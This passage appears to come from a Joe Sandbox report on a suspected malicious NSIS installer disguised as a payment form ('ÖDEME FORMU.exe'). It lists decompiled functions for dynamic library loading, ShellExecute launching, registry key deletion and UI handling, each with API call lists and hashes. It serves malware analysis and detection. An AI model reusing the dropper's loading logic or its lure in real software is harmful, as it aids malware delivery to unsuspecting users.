					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405D9C( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						_push( *(_t35 - 8));
						_push( *(_t35 + 8));
						E00405842();
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401423();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401656
0x00401666
0x0040166a
0x00401672
0x00401689
0x00401691
0x0040169a
0x0040169a
0x004016ad
0x004016b9
0x004026bf
0x004016cf
0x004016cf
0x004016d2
0x004016d5
0x004016da
0x00000000
0x004016da
0x004016af
0x004016af
0x004021ba
0x004021ba
0x004021ba
0x0040291d
0x00402929

APIs

Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,fjvkkubvvke Setup,NSIS Error), ref: 00405B01

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401672
lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040167C
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401691
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,?,C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040169A

Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560), ref: 00405DAA
Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8

Part of subcall function 00405842: CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 0040588F
Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 00405898
Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 004058B5
Part of subcall function 00405842: wsprintfA.USER32 ref: 004058D3
Part of subcall function 00405842: GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
Part of subcall function 00405842: GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
Part of subcall function 00405842: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933

MoveFileA.KERNEL32 ref: 004016A5

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401661, 00401669, 00401699

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: File$CloseErrorFindModeNamePathShortlstrcatlstrlen$AllocFirstGlobalHandleMoveReadSizelstrcpynwsprintf
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3481313339-501415292
Opcode ID: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
Instruction ID: e3d936c7b2e8568bf3afc9a15eb44f15e117e5a8b541455a4ce6046f775872e9
Opcode Fuzzy Hash: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
Instruction Fuzzy Hash: 9D119E31A04104BBCF01BFA1CD0899E3A72EF40354F14463BF801B61E6DA7D8A929A4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040476E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040476E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x0040477c
0x00404789
0x0040478f
0x004047cd
0x004047cd
0x004047dc
0x004047e3
0x00000000
0x004047e5
0x00404791
0x004047a0
0x004047a8
0x004047ab
0x004047bd
0x004047c3
0x004047ca
0x00000000
0x004047ca
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404789
GetMessagePos.USER32 ref: 00404791
ScreenToClient.USER32 ref: 004047AB
SendMessageA.USER32(?,00001111,00000000,?), ref: 004047BD
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047E3

Strings

f, xrefs: 004047BF

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
Instruction ID: 9f845b30ae688ed4ef755a08d3db5d44298bc8acb818865eb6350a94e1b176cf
Opcode Fuzzy Hash: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
Instruction Fuzzy Hash: A5015275D00219BADB10DBA4DC85BFFBBBCAB55B15F10412BBB00B72C0D7B469418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401FAB Relevance: 9.1, APIs: 6, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00401FAB(int __ebx) {
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t42;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001);
				_t42 =  *0x423fd4 - _t28; // 0x0
				if(_t42 < 0) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A85(0xfffffff0);
					 *(_t37 + 8) = E00402A85(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t33 = LoadLibraryExA(_t35, _t28, 8);
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401423();
						} else {
							goto L4;
						}
					} else {
						_t33 = GetModuleHandleA(_t35);
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404E9F(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x424000, 0x40a7f8, 0x409000);
								} else {
									E00401423( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
				return 0;
			}

0x00401fab
0x00401fb3
0x00401fb6
0x00401fbc
0x00401fc2
0x00402065
0x00000000
0x00401fc8
0x00401fd0
0x00401fda
0x00401fdd
0x00401fec
0x00401ff6
0x00401ffa
0x00402061
0x00402067
0x00402067
0x00000000
0x00000000
0x00000000
0x00401fdf
0x00401fe6
0x00401fea
0x00401ffc
0x00402006
0x0040200a
0x0040204e
0x0040200c
0x0040200f
0x00402012
0x00402042
0x00402014
0x00402017
0x00402020
0x00402022
0x00402022
0x00402020
0x00402012
0x00402056
0x00402059
0x00402059
0x00000000
0x00000000
0x00000000
0x00401fea
0x00401fdd
0x0040206d
0x0040291d
0x00402929

APIs

SetErrorMode.KERNEL32(00008001), ref: 00401FB6
GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FE0

Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001004,00000000,00000000), ref: 00404F33
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001007,00000000,00000001), ref: 00404F4D
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001013,?,00000000), ref: 00404F5B

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FF0
GetProcAddress.KERNEL32(00000000,?), ref: 00402000
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402059
SetErrorMode.KERNEL32 ref: 0040206D

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 1609199483-0
Opcode ID: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
Instruction ID: 895be71df4ac45a5aeeb3ddaf5be92ea7e9d143a6a7ef1567a24186397f5d55d
Opcode Fuzzy Hash: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
Instruction Fuzzy Hash: E4210B31D04315EBCB207FA5DE8C95F7A70AB45354B20413BF611B22E0CBBC4A82DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040567B Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040567B(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x40543a
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405612(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x00405684
0x00405684
0x0040568b
0x0040568e
0x00405693
0x004056a6
0x004056c0
0x00000000
0x004056c0
0x004056aa
0x004056ab
0x004056ae
0x004056af
0x004056b7
0x00000000
0x00000000
0x004056b9
0x004056bc
0x00000000
0x00000000
0x00000000
0x004056bc
0x00000000
0x0040569c
0x00000000
0x0040569d

APIs

CharNextA.USER32(:T@,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560,00000000), ref: 00405689
CharNextA.USER32(00000000), ref: 0040568E
CharNextA.USER32(00000000), ref: 0040569D

Strings

C:\, xrefs: 0040567C
:T@, xrefs: 00405684, 00405688
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 00405683

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CharNext
String ID: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $:T@$C:\
API String ID: 3213498283-2022792732
Opcode ID: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
Instruction ID: 378ecf4657a12380a446d3b042b521289e3ad6747402889725e3da158347204d
Opcode Fuzzy Hash: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
Instruction Fuzzy Hash: 2DF02751A10F215AEB2222644C54B7B6BACDB55320F440C37E544F61E0C3BD4C92CFAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401E0E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401E0E() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A85(_t19);
				_t20 = E00402A85(0x31);
				_t7 = E00402A85(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\hardz\AppData\Local\Temp", "%s %s");
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x00401e16
0x00401e1f
0x00401e21
0x00401e26
0x00401e27
0x00401e32
0x00401e34
0x00401e3f
0x00401e4b
0x00401e59
0x00401e6b
0x004026bf
0x004026bf
0x0040291d
0x00402929

APIs

wsprintfA.USER32 ref: 00401E34
ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E62

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401E4D
%s %s, xrefs: 00401E28
C:\Users\user\AppData\Local\Temp, xrefs: 00401E2D

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ExecuteShellwsprintf
String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
API String ID: 2956387742-183961376
Opcode ID: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
Instruction ID: 51fa150e18871bc54a8ab07165f54a8d5d4e89d78de25ff2bd43d0f4b5788034
Opcode Fuzzy Hash: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
Instruction Fuzzy Hash: E6F0D171B04100ABC721AFB59D4EEA93BA8DB45318B600936F800F61D2E5BC89519668

Uniqueness

Uniqueness Score: -1.00%

Function 00402AC5 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402AC5(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423fd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402AC5(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DDA(2);
					if(_t27 == 0) {
						__eflags =  *0x423fd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423fd0, 0);
				}
				return _t18;
			}

0x00402ad5
0x00402ae6
0x00402aee
0x00402b16
0x00402afd
0x00402b00
0x00402b50
0x00402b56
0x00402b58
0x00000000
0x00402b58
0x00402b0d
0x00402b12
0x00402b14
0x00000000
0x00000000
0x00402b14
0x00402b2b
0x00402b33
0x00402b3a
0x00402b60
0x00402b66
0x00000000
0x00000000
0x00402b6e
0x00402b74
0x00402b76
0x00000000
0x00000000
0x00000000
0x00402b76
0x00000000
0x00402b49
0x00402b5d

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402AE6
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B22
RegCloseKey.ADVAPI32(?), ref: 00402B2B
RegCloseKey.ADVAPI32(?), ref: 00402B50
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B6E

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
Instruction ID: a2f84c9fc7c0001da7a9db1dd1493ef20417761c41d84b505e0dd7cc978203d5
Opcode Fuzzy Hash: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
Instruction Fuzzy Hash: 17116D31A00009FEDF21AF90DE48EAF3B7DEB44344B104036FA05B50A0D3B4AE52AB69

Uniqueness

Uniqueness Score: -1.00%

Function 00401D0E Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D0E(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A85(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x1c),  *(_t27 - 0x3c) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d18
0x00401d1f
0x00401d4e
0x00401d56
0x00401d5d
0x00401d5d
0x0040291d
0x00402929

APIs

GetDlgItem.USER32 ref: 00401D12
GetClientRect.USER32 ref: 00401D1F
LoadImageA.USER32 ref: 00401D40
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D4E
DeleteObject.GDI32(00000000), ref: 00401D5D

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
Instruction ID: 353d02df9da9ec42832837f4cb5a1f013013b856dd18917493dbd5b1045c63a4
Opcode Fuzzy Hash: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
Instruction Fuzzy Hash: 25F0F9B2E04104BFD700DFA4EE88DAFB7BCEB44311B005476F602F21A1C6789E428B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040468C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040468C(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B16(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B16(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B16(_t34, 0, 0x420530, 0x420530, _a8);
				wsprintfA(_t26 + lstrlenA(0x420530), "%u.%u%s%s");
				return SetDlgItemTextA( *0x4236f8, _a4, 0x420530);
			}

0x00404694
0x00404698
0x004046a0
0x004046a3
0x004046a4
0x004046a6
0x004046a8
0x004046ab
0x004046ab
0x004046b2
0x004046b8
0x004046b8
0x004046bf
0x004046ca
0x004046cb
0x004046ce
0x004046ce
0x004046db
0x004046e6
0x004046e9
0x004046fb
0x00404702
0x00404703
0x00404712
0x00404722
0x0040473e

APIs

lstrlenA.KERNEL32(00420530,00420530,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AC,000000DF,?,00000000,00000400), ref: 0040471A
wsprintfA.USER32 ref: 00404722
SetDlgItemTextA.USER32 ref: 00404735

Strings

%u.%u%s%s, xrefs: 00404704

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
Instruction ID: fc2b73f6c965b4b8d77eae39fc1b1cea645aa0e87c551c7386791207db77a036
Opcode Fuzzy Hash: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
Instruction Fuzzy Hash: B7110473B001243BDB106A699C06EAF369DCBC2374F14063BFA25F61D1E979AC5186EC

Uniqueness

Uniqueness Score: -1.00%

Function 00401BF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00401BF8(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A85(0x33);
				 *(_t58 + 8) = E00402A85(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405A6B(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405A6B(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A85();
					_t30 = E00402A85();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
